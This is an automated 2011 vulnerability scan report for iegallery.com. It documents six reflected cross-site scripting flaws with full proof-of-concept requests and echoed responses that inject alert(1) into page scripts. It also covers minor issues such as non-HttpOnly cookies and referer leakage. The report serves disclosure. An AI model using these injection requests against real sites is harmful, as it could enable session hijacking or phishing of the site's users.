XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, iegallery.com

Report generated by XSS.CX at Sun Dec 04 08:41:00 CST 2011.

Loading



1. Cross-site scripting (reflected)

1.1. http://www.iegallery.com/ [5aa1e%22%3balert(1)//471376c2ade parameter]

1.2. http://www.iegallery.com/ [name of an arbitrarily supplied request parameter]

1.3. http://www.iegallery.com/en/ [5aa1e%22%3balert(1)%2f%2f471376c2ade parameter]

1.4. http://www.iegallery.com/en/ [name of an arbitrarily supplied request parameter]

1.5. http://www.iegallery.com/us/addons/default.aspx [name of an arbitrarily supplied request parameter]

1.6. http://www.iegallery.com/us/addons/detail.aspx [name of an arbitrarily supplied request parameter]

2. Source code disclosure

3. Cross-domain Referer leakage

3.1. http://www.iegallery.com/en/

3.2. http://www.iegallery.com/us/addons/detail.aspx

4. Cross-domain script include

5. Cookie without HttpOnly flag set

5.1. http://www.iegallery.com/en/

5.2. http://www.iegallery.com/en/pinnedsites/detail.aspx

5.3. http://www.iegallery.com/en/signout.aspx

5.4. http://www.iegallery.com/us/Register.aspx

5.5. http://www.iegallery.com/us/addons/detail.aspx

5.6. http://www.iegallery.com/us/pinnedsites/default.aspx

5.7. http://www.iegallery.com/us/pinnedsites/detail.aspx

5.8. http://www.iegallery.com/us/trackingprotectionlists/default.aspx

6. Email addresses disclosed

6.1. http://www.iegallery.com/en/assets/js/holiday.js

6.2. http://www.iegallery.com/en/assets/js/s_code.js



1. Cross-site scripting (reflected)  next
There are 6 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.iegallery.com/ [5aa1e%22%3balert(1)//471376c2ade parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /

Issue detail

The value of the 5aa1e%22%3balert(1)//471376c2ade request parameter is copied into a JavaScript rest-of-line comment. The payload 9c596%0aalert(1)//f7fdcd8dda1 was submitted in the 5aa1e%22%3balert(1)//471376c2ade parameter. This input was echoed as 9c596
alert(1)//f7fdcd8dda1
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?5aa1e%22%3balert(1)//471376c2ade=19c596%0aalert(1)//f7fdcd8dda1 HTTP/1.1
Host: www.iegallery.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: viewedLearnMorePinned=true

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:33:05 GMT
Last-Modified: Sun, 04 Dec 2011 03:33:05 GMT
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=omsicpcap1vuibyyntijvt4f; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=b127c84c-30fb-4685-a2d1-185dca20eeee; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:33:04 GMT
Content-Length: 42555


<!DOCTYPE html>


<html lang="en" data-rootlocation="en/"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com/2008/fbml"
xmlns:og="http://opg.me/ns#"
   xm
...[SNIP]...
ifying name, server, and channel on
the next lines. */
try {
s.account="";
s.pageName="home / en-us / http://www.iegallery.com/Default.aspx?mainlang=en&maincountry=us&5aa1e";alert(1)//471376c2ade=19c596
alert(1)//f7fdcd8dda1
";
s.server=""
s.channel="home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="en-us";
/* Conversion
...[SNIP]...

1.2. http://www.iegallery.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload 77c85%0aalert(1)//d7289956276 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 77c85
alert(1)//d7289956276
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?5aa1e%22%3balert(1)//471376c2ade=1&77c85%0aalert(1)//d7289956276=1 HTTP/1.1
Host: www.iegallery.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: viewedLearnMorePinned=true

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:33:09 GMT
Last-Modified: Sun, 04 Dec 2011 03:33:09 GMT
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=zsjcqpiwqpuzezmi5e5be511; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=5881214d-03ee-4692-a95d-c026c0f8bec2; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:33:10 GMT
Content-Length: 42558


<!DOCTYPE html>


<html lang="en" data-rootlocation="en/"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com/2008/fbml"
xmlns:og="http://opg.me/ns#"
   xm
...[SNIP]...
fying name, server, and channel on
the next lines. */
try {
s.account="";
s.pageName="home / en-us / http://www.iegallery.com/Default.aspx?mainlang=en&maincountry=us&5aa1e";alert(1)//471376c2ade=1&77c85
alert(1)//d7289956276
=1";
s.server=""
s.channel="home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="en-us";
/* Conversi
...[SNIP]...

1.3. http://www.iegallery.com/en/ [5aa1e%22%3balert(1)%2f%2f471376c2ade parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /en/

Issue detail

The value of the 5aa1e%22%3balert(1)%2f%2f471376c2ade request parameter is copied into a JavaScript rest-of-line comment. The payload 87c69%0aalert(1)//478a96200b6 was submitted in the 5aa1e%22%3balert(1)%2f%2f471376c2ade parameter. This input was echoed as 87c69
alert(1)//478a96200b6
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/?5aa1e%22%3balert(1)%2f%2f471376c2ade=187c69%0aalert(1)//478a96200b6 HTTP/1.1
Host: www.iegallery.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: viewedLearnMorePinned=true; viewedLearnMorePinned=true

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:32:47 GMT
Last-Modified: Sun, 04 Dec 2011 03:32:47 GMT
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=suzn4dfcm4cbdrxh1bkxqsgk; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=d40b1434-d467-4b11-9492-738b07854cde; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:32:47 GMT
Content-Length: 42555


<!DOCTYPE html>


<html lang="en" data-rootlocation="en/"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com/2008/fbml"
xmlns:og="http://opg.me/ns#"
   xm
...[SNIP]...
ifying name, server, and channel on
the next lines. */
try {
s.account="";
s.pageName="home / en-us / http://www.iegallery.com/Default.aspx?mainlang=en&maincountry=us&5aa1e";alert(1)//471376c2ade=187c69
alert(1)//478a96200b6
";
s.server=""
s.channel="home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="en-us";
/* Conversion
...[SNIP]...

1.4. http://www.iegallery.com/en/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /en/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload 23a39%0aalert(1)//22da7560a84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23a39
alert(1)//22da7560a84
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/?5aa1e%22%3balert(1)%2f%2f471376c2ade=1&23a39%0aalert(1)//22da7560a84=1 HTTP/1.1
Host: www.iegallery.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: viewedLearnMorePinned=true; viewedLearnMorePinned=true

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:32:46 GMT
Last-Modified: Sun, 04 Dec 2011 03:32:46 GMT
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=vvzulxq5d2ojnaxhhpsz3eyn; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=8e34e771-df1e-493b-a195-593d462ef789; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:32:45 GMT
Content-Length: 42558


<!DOCTYPE html>


<html lang="en" data-rootlocation="en/"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com/2008/fbml"
xmlns:og="http://opg.me/ns#"
   xm
...[SNIP]...
fying name, server, and channel on
the next lines. */
try {
s.account="";
s.pageName="home / en-us / http://www.iegallery.com/Default.aspx?mainlang=en&maincountry=us&5aa1e";alert(1)//471376c2ade=1&23a39
alert(1)//22da7560a84
=1";
s.server=""
s.channel="home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="en-us";
/* Conversi
...[SNIP]...

1.5. http://www.iegallery.com/us/addons/default.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /us/addons/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2070c"%3balert(1)//0cf78b3a7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2070c";alert(1)//0cf78b3a7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/addons/default.aspx?2070c"%3balert(1)//0cf78b3a7b=1 HTTP/1.1
Host: www.iegallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:41:08 GMT
Last-Modified: Sun, 04 Dec 2011 03:41:08 GMT
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=qaa4t25xyj0j5n1rmodstebx; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=1111690d-75d8-4700-b0f6-c4fbb222bb3a; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:07 GMT
Connection: close
Content-Length: 37674


<!DOCTYPE html>


<html lang="en" data-rootlocation="/en/"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com/2008/fbml"
xmlns:og="http://opg.me/ns#"
   x
...[SNIP]...
page an identifying name, server, and channel on
the next lines. */
try {
s.account="";
s.pageName="addons browse / en-us / http://www.iegallery.com/addons/default.aspx?mainlang=en&maincountry=us&2070c";alert(1)//0cf78b3a7b=1";
s.server=""
s.channel="addons browse";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="en-us";
/*
...[SNIP]...

1.6. http://www.iegallery.com/us/addons/detail.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /us/addons/detail.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b31ab"%3balert(1)//653ec497d60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b31ab";alert(1)//653ec497d60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/addons/detail.aspx?id=790&b31ab"%3balert(1)//653ec497d60=1 HTTP/1.1
Host: www.iegallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:41:10 GMT
Last-Modified: Sun, 04 Dec 2011 03:41:10 GMT
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=joeld11lfqlfrqghcyeiggyl; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=f29231c9-9bd4-494f-af67-70872e5b8810; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:10 GMT
Connection: close
Content-Length: 35463


<!DOCTYPE html>


<html lang="en" data-rootlocation="/en/"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com/2008/fbml"
xmlns:og="http://opg.me/ns#"
   x
...[SNIP]...
an identifying name, server, and channel on
the next lines. */
try {
s.account="";
s.pageName="addons detail / en-us / http://www.iegallery.com/addons/detail.aspx?mainlang=en&maincountry=us&id=790&b31ab";alert(1)//653ec497d60=1";
s.server=""
s.channel="addons detail";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="en-us";
/*
...[SNIP]...

2. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.iegallery.com
Path:   /en/assets/js/interactions.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /en/assets/js/interactions.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.iegallery.com/en/?5aa1e%22%3balert(1)%2f%2f471376c2ade=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.iegallery.com
Cookie: ASP.NET_SessionId=ynbopximcbbiy2bp1njvsudw; ie8_webslice_anonymous=3325a3bc-90e2-472e-9b40-a650ee2d56b1

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 02 Dec 2011 20:31:16 GMT
Accept-Ranges: bytes
ETag: "32eda75731b1cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:02 GMT
Content-Length: 65729

var CATEGORY = -1;
var RESOURCE_TYPE = -1;
var TOTAL_RESOURCE_COUNT = 0;
var CURRENT_PAGE = 1;
var FEATURE_NAME = 'all';
var CURRENT_LOCALE = 'en';
var SEARCH_TERM = '';

var user_agent = navi
...[SNIP]...
<fb:like class="fb_edge_width_with_comment fb_iframe_widget" \
href="http://www.iegallery.com/<%= Locale.GetCurrentLocale().CountryCode %>/pinnedsites/detail.aspx?id=<%= resource_id %>" layout="button_count" \
show_faces="false" send="true">
...[SNIP]...

3. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


3.1. http://www.iegallery.com/en/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /en/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en/?5aa1e%22%3balert(1)%2f%2f471376c2ade=1 HTTP/1.1
Host: www.iegallery.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: viewedLearnMorePinned=true; viewedLearnMorePinned=true

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:32:19 GMT
Last-Modified: Sun, 04 Dec 2011 03:32:19 GMT
Vary: *
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=j35j4vpapih1cadkelqyoasu; path=/; HttpOnly
Set-Cookie: ie8_webslice_anonymous=f6940200-bddf-4746-a578-29a29f08aa74; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:32:19 GMT
Content-Length: 42528


<!DOCTYPE html>


<html lang="en" data-rootlocation="en/"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com/2008/fbml"
xmlns:og="http://opg.me/ns#"
   xm
...[SNIP]...
<li>
                               
<a id="LoginView1_SignInLink" href="https://internetexplorergallery.accesscontrol.windows.net:443/v2/wsfederation?wa=wsignin1.0&amp;wtrealm=http%3a%2f%2fwww.iegallery.com%2f">Sign In</a>
...[SNIP]...
<div id="message_download">
    <a class="download" href="http://microsoft.com/ie9" aria-label="Download Windows&copy; Internet Explorer 9 Now" onclick="Analytics.trackIEDownload();"
    accesskey="1">
Download Now</a>
...[SNIP]...
<div>
<img id="Main_rFeaturedSites_FeaturedSiteLogo_0" class="thumbnail" src="http://az31465.vo.msecnd.net/upload/e0aaf74f-da2c-44e8-b478-c96827d3cf42.jpg" />
</div>
...[SNIP]...
</a>
<img id="Main_rFeaturedSites_FeaturedSiteThumbnail_0" class="thumbnail" src="http://az31465.vo.msecnd.net/upload/aa3d915f-6099-418d-9201-a6091323ab74.jpg" />
</section>
...[SNIP]...
<div>
<img id="Main_rFeaturedSites_FeaturedSiteLogo_1" class="thumbnail" src="http://az31465.vo.msecnd.net/upload/d915dede-6e13-4571-b48b-cb3a90740fec.jpg" />
</div>
...[SNIP]...
</a>
<img id="Main_rFeaturedSites_FeaturedSiteThumbnail_1" class="thumbnail" src="http://az31465.vo.msecnd.net/upload/e57260c7-20cd-4420-8e61-334d5cb34519.jpg" />
</section>
...[SNIP]...
<div>
<img id="Main_rFeaturedSites_FeaturedSiteLogo_2" class="thumbnail" src="http://az31465.vo.msecnd.net/upload/d3238a09-0519-4dca-8621-044d6d39b31e.jpg" />
</div>
...[SNIP]...
</a>
<img id="Main_rFeaturedSites_FeaturedSiteThumbnail_2" class="thumbnail" src="http://az31465.vo.msecnd.net/upload/5b820de7-9219-4c5a-a181-01513f9d500e.jpg" />
</section>
...[SNIP]...
<div>
<img id="Main_rFeaturedSites_FeaturedSiteLogo_3" class="thumbnail" src="http://az31465.vo.msecnd.net/upload/5e984783-d5f9-4cb6-8513-e7c547c739e7.jpg" />
</div>
...[SNIP]...
</a>
<img id="Main_rFeaturedSites_FeaturedSiteThumbnail_3" class="thumbnail" src="http://az31465.vo.msecnd.net/upload/e931b0fa-ac02-40d7-95fd-0e60b18f9789.jpg" />
</section>
...[SNIP]...
<div>
<img id="Main_rFeaturedSites_FeaturedSiteLogo_4" class="thumbnail" src="http://az31465.vo.msecnd.net/upload/1a79bff7-9079-4d21-b62f-3264f263f97a.jpg" />
</div>
...[SNIP]...
</a>
<img id="Main_rFeaturedSites_FeaturedSiteThumbnail_4" class="thumbnail" src="http://az31465.vo.msecnd.net/upload/f85e080a-d5f4-4cae-aa8f-cc30b7a15a0e.jpg" />
</section>
...[SNIP]...
<div>
           <a href="http://www.microsoft.com/windows/"><img src="/assets/images/layout/logo_windows.png" alt="Windows" class="logo_windows" />
...[SNIP]...
<li><a href="http://support.microsoft.com/contactus/?ws=mscom" target="_blank">Contact Us</a>
...[SNIP]...
<li><a href="http://explore.live.com/microsoft-service-agreement?ref=none&mkt=en-us" id="termsLink" target="_blank">Terms of Use</a>
...[SNIP]...
<li><a href="http://www.microsoft.com/About/Legal/EN/US/IntellectualProperty/Trademarks/EN-US.aspx" target="_blank">Trademarks</a>
...[SNIP]...
<li><a href="http://privacy.microsoft.com/en-us/default.mspx" target="_blank">Privacy Statement</a>
...[SNIP]...
<li>
<a id="LoginView2_SubmitLink" href="https://internetexplorergallery.accesscontrol.windows.net:443/v2/wsfederation?wa=wsignin1.0&amp;wtrealm=http%3a%2f%2fwww.iegallery.com%2f">Submit to Gallery</a>
...[SNIP]...
<li><a class="news_center" href="http://www.microsoft.com/presspass/presskits/internetexplorer/" target="_blank">News Center</a>
...[SNIP]...
<span class="logo_azure" id="logo_azure"><a href="http://www.microsoft.com/windowsazure/" target="_blank"><img src="/assets/images/layout/logo_azure.png" />
...[SNIP]...
</span>
           <a href="http://www.microsoft.com"><img src="/assets/images/layout/logo_microsoft.png" alt="Microsoft" class="logo_microsoft" />
...[SNIP]...

3.2. http://www.iegallery.com/us/addons/detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iegallery.com
Path:   /us/addons/detail.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/addons/detail.aspx?id=790 HTTP/1.1
Host: www.iegallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=3599
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Dec 2011 04:41:02 GMT
Last-Modified: Sun, 04 Dec 2011 03:41:02 GMT
Vary: *
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Dec 2011 03:41:03 GMT
Connection: close
Content-Length: 35432


<!DOCTYPE html>


<html lang="en" data-rootlocation="/en/"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook.com/2008/fbml"
xmlns:og="http://opg.me/ns#"
   x
...[SNIP]...
<li>
                               
<a id="LoginView1_SignInLink" href="https://internetexplorergallery.accesscontrol.windows.net:443/v2/wsfederation?wa=wsignin1.0&amp;wtrealm=http%3a%2f%2fwww.iegallery.com%2f">Sign In</a>
...[SNIP]...
<div id="message_download">
    <a class="download" href="http://microsoft.com/ie9" aria-label="Download Windows&copy; Internet Explorer 9 Now" onclick="Analytics.trackIEDownload();"
    accesskey="1">
Download Now</a>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<li id="twitter">
<iframe allowtransparency="true" frameborder="0" scrolling="no"
src="http://platform.twitter.com/widgets/tweet_button.html?text=Bing Search %23IE9"
style="width:130px; height:20px;">
</iframe>
...[SNIP]...
<div class="slides">
<img src="http://az31465.vo.msecnd.net/upload/5be50c16-c402-41bc-a788-70161efa0451_gm.jpg" id="Main_ResourceImageLarge" />

</div>
...[SNIP]...
<div class="login" style="display:none;" ><a href="https://internetexplorergallery.accesscontrol.windows.net:443/v2/wsfederation?wa=wsignin1.0&wtrealm=http%3a%2f%2fwww.iegallery.com%2f">Sign in now to rate</a>
...[SNIP]...
<p><a href="http://www.bing.com" id="Main_ResourceLink">http://www.bing.com</a>
...[SNIP]...
<div>
           <a href="http://www.microsoft.com/windows/"><img src="/assets/images/layout/logo_windows.png" alt="Windows" class="logo_windows" />
...[SNIP]...
<li><a href="http://support.microsoft.com/contactus/?ws=mscom" target="_blank">Contact Us</a>
...[SNIP]...
<li><a href="http://explore.live.com/microsoft-service-agreement?ref=none&mkt=en-us" id="termsLink" target="_blank">Terms of Use</a>
...[SNIP]...
<li><a href="http://www.microsoft.com/About/Legal/EN/US/IntellectualProperty/Trademarks/EN-US.aspx" target="_blank">Trademarks</a>
...[SNIP]...
<li><a href="http://privacy.microsoft.com/en-us/default.mspx" target="_blank">Privacy Statement</a>
...[SNIP]...
<li>
<a id="LoginView2_SubmitLink" href="https://internetexplorergallery.accesscontrol.windows.net:443/v2/wsfederation?wa=wsignin1.0&amp;wtrealm=http%3a%2f%2fwww.iegallery.com%2f">Submit to Gallery</a>
...[SNIP]...
<li><a class="news_center" href="http://www.microsoft.com/presspass/presskits/internetexplorer/" target="_blank">News Center</a>
...[SNIP]...
